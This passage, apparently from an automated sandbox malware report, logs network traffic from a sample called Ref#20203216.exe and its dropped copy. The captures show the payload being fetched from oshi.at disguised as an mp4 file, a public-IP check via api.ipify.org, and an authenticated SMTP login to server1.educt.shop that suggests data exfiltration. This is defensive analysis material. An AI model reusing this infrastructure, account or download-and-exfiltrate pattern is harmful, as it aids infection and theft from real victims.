                                                                                                Dec 23, 2024 09:09:05.851869106 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:05.895334959 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.797956944 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.797986031 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.798188925 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.798212051 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.798331022 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.808336973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.808474064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.816771984 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.816854000 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.916718960 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.916857004 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:06.991950035 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:06.992072105 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.000264883 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.000333071 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.017036915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.017147064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.033541918 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.033662081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.042227983 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.042349100 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.058969021 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.059072971 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.070571899 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.070715904 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.080950022 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.081012964 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.181529999 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.181619883 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.189824104 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.189970016 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.195406914 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.195513964 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.204251051 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.204334974 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.213011980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.213114977 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.217272997 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.217375994 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.225584030 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.225670099 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.233577013 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.233741999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.237842083 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.238030910 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.246378899 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.246474028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.250063896 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254390001 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254455090 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.254467010 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.254559040 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.262340069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.262557983 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.270567894 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.270632982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.274740934 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.274796009 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.282820940 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.282897949 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.373586893 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.373703003 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.981087923 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.983022928 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.983095884 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.985172033 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.985276937 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.986849070 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.986998081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.988327980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.988404036 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.990535975 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.990845919 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.992912054 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.992975950 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.995172024 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.995238066 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.996393919 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.996457100 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:07.998495102 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:07.998560905 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.028431892 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.028516054 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.030018091 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.030076027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.032218933 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.032479048 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.033698082 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.033768892 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.035912991 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.035976887 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.038014889 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.038094044 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.142585039 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.142673016 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.142903090 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.143027067 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.145221949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.145351887 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.146503925 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.146570921 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.148703098 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.148801088 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.151026964 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.151082039 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.152328014 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.152435064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.154639959 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.154721022 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.156831980 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.156900883 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.158174038 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.158292055 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.160480022 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.160535097 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.162681103 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.162863970 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.163981915 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.164091110 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.166294098 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.166558027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.168474913 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.168571949 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.170813084 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.170921087 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.172147036 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.172250032 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.174310923 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.174443960 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.174587011 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.176989079 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.177045107 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.177066088 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.177114010 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.178757906 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.178874969 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.181013107 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.181071997 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.183021069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.183114052 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.184506893 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.184575081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.187057972 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.187139034 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.188833952 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.188925028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.190640926 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.190891027 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.220773935 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.220848083 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.222210884 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.222377062 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.223495007 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.223603010 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.225828886 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.225945950 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.228030920 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.228096962 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.229312897 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.229484081 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.334723949 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.334969997 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.336277962 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.336353064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.336399078 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338749886 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338830948 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.338840961 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.338901043 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.340900898 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.341038942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.342202902 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.342293024 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.344511986 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.344578028 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.346767902 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.346852064 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.348026037 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.348093033 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.350400925 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.350474119 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.352648973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.352776051 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.353913069 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.354032993 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.356184006 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.356256962 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.358388901 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.358448982 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.360742092 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.360881090 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.362054110 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.362122059 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.364185095 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.364262104 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.366600990 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.366703987 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.367841005 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.368046999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.369096994 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.369216919 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.370632887 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.370735884 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.372931957 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.372993946 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.374706030 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.374768972 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.377284050 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.377371073 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.379544973 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.379637003 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.380753994 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.380811930 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.383460999 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.383559942 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.412873983 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.412964106 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.413702011 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.413768053 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.415890932 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.415954113 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.418221951 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.418311119 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.419528961 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.419612885 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.421725988 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.421808958 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.526784897 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.526859999 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.527398109 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.527467966 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.529706955 CET443497385.253.86.15192.168.2.4
                                                                                                Dec 23, 2024 09:09:08.529784918 CET49738443192.168.2.45.253.86.15
                                                                                                Dec 23, 2024 09:09:08.532000065 CET443497385.253.86.15192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 09:08:46.577495098 CET | 51513 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:08:46.911849976 CET | 53 | 51513 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 09:08:53.032646894 CET | 57474 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 09:08:53.170420885 CET | 53 | 57474 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 09:08:46.577495098 CET | 192.168.2.4 | 1.1.1.1 | 0x88c7 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:08:53.032646894 CET | 192.168.2.4 | 1.1.1.1 | 0x6813 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 09:08:46.911849976 CET | 1.1.1.1 | 192.168.2.4 | 0x88c7 | No error (0) | oshi.at | | 5.253.86.15 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:08:46.911849976 CET | 1.1.1.1 | 192.168.2.4 | 0x88c7 | No error (0) | oshi.at | | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:08:53.170420885 CET | 1.1.1.1 | 192.168.2.4 | 0x6813 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:08:53.170420885 CET | 1.1.1.1 | 192.168.2.4 | 0x6813 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:08:53.170420885 CET | 1.1.1.1 | 192.168.2.4 | 0x6813 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                                                                • oshi.at
                                                                                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 5.253.86.15 | 443 | 6776 | C:\Users\user\Desktop\Ref#20203216.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:08:48 UTC | 61 | OUT | GET /nvgU HTTP/1.1
Host: oshi.at
Connection: Keep-Alive
2024-12-23 08:08:49 UTC | 301 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 08:08:49 GMT
Content-Type: video/mp4
Content-Length: 997896
Connection: close
Last-Modified: Mon, 23 Dec 2024 00:20:33 GMT
Accept-Ranges: bytes
ETag: "51652c24f2733a9a3e405e7f7691ae0b"
Content-Disposition: attachment; filename=eFcR.mp4
                                                                                                Data Ascii: `UW-6=1ui;Ca~ZB7dL f-ADV=RkFOHy]m+Uc>EN#zWN ;&"{L=5mtpNhYybtf>[!?Kwf;R_^Z"!RZX>cD="d-L!(%4+E;Z)
                                                                                                2024-12-23 08:08:49 UTC4096INData Raw: 51 28 20 53 33 87 db e0 67 82 4b ec 81 96 e8 b9 15 58 27 bd c8 01 f0 ca 85 0b 10 7a c3 59 52 0c e4 5a 45 77 8f eb 61 cd 11 92 db be 60 8f b2 69 2d 6f 6c 78 db 16 22 a9 0c c9 bc d9 3b f2 7c 92 93 67 48 03 e0 a9 ed 1e f8 06 80 2a 33 b2 c5 26 82 1a a9 01 33 2c 45 1e af c1 c9 b7 8c e0 8e 55 b7 9f df 02 79 3f f9 46 a8 c7 e3 c3 25 1d a7 98 31 af 26 33 87 fb 2c a6 78 cd df ed c0 cf 0a 75 c7 52 63 c7 0e 09 40 3f 9d 76 01 8d 28 32 a8 06 ff 8a 27 1b a3 34 c5 c5 ad f7 a4 fb 48 d9 07 da be 82 0b fb 89 df 43 a3 b1 46 09 06 66 a3 5f f3 2d 84 82 27 c1 be 86 51 75 b8 3b 68 a7 37 9a 8f 00 6f 6a 3a fc 3b d5 8a 96 d9 63 73 49 68 3f 7e 96 4b 61 7c 47 1c 82 f6 e3 1c 57 fc 18 47 ef e8 4e 74 9e cd 33 93 37 3f 56 50 06 63 8e 09 02 10 8f 4d f2 01 06 7d e3 42 66 45 01 40 24 60 d8
                                                                                                Data Ascii: Q( S3gKX'zYRZEwa`i-olx";|gH*3&3,EUy?F%1&3,xuRc@?v(2'4HCFf_-'Qu;h7oj:;csIh?~Ka|GWGNt37?VPcM}BfE@$`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.26.13.205 | 443 | 2120 | C:\Users\user\Desktop\Ref#20203216.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:08:54 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-12-23 08:08:54 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:08:54 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8f66ddcdbec74289-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1599&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1802469&cwnd=150&unsent_bytes=0&cid=949005fd35cac83d&ts=456&x=0"
2024-12-23 08:08:54 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 5.253.86.15 | 443 | 3264 | C:\Users\user\AppData\Roaming\iulue.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:09:05 UTC | 61 | OUT | GET /nvgU HTTP/1.1
Host: oshi.at
Connection: Keep-Alive
2024-12-23 08:09:06 UTC | 301 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 08:09:06 GMT
Content-Type: video/mp4
Content-Length: 997896
Connection: close
ETag: "51652c24f2733a9a3e405e7f7691ae0b"
Content-Disposition: attachment; filename=eFcR.mp4
Accept-Ranges: bytes
Last-Modified: Mon, 23 Dec 2024 00:20:33 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 104.26.13.205 | 443 | 7116 | C:\Users\user\AppData\Roaming\iulue.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:09:11 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-12-23 08:09:11 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:09:11 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8f66de369f0d41ac-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1595&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1830721&cwnd=252&unsent_bytes=0&cid=cc27386ec4335e4b&ts=452&x=0"
2024-12-23 08:09:11 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 23, 2024 09:08:56.868226051 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 220 server1.educt.shop ESMTP Postfix
Dec 23, 2024 09:08:56.872340918 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | EHLO 305090
Dec 23, 2024 09:08:57.255203009 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250-server1.educt.shop
250-PIPELINING
250-SIZE 204800000
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Dec 23, 2024 09:08:57.256475925 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Dec 23, 2024 09:08:57.638654947 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Dec 23, 2024 09:08:58.036571980 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 235 2.7.0 Authentication successful
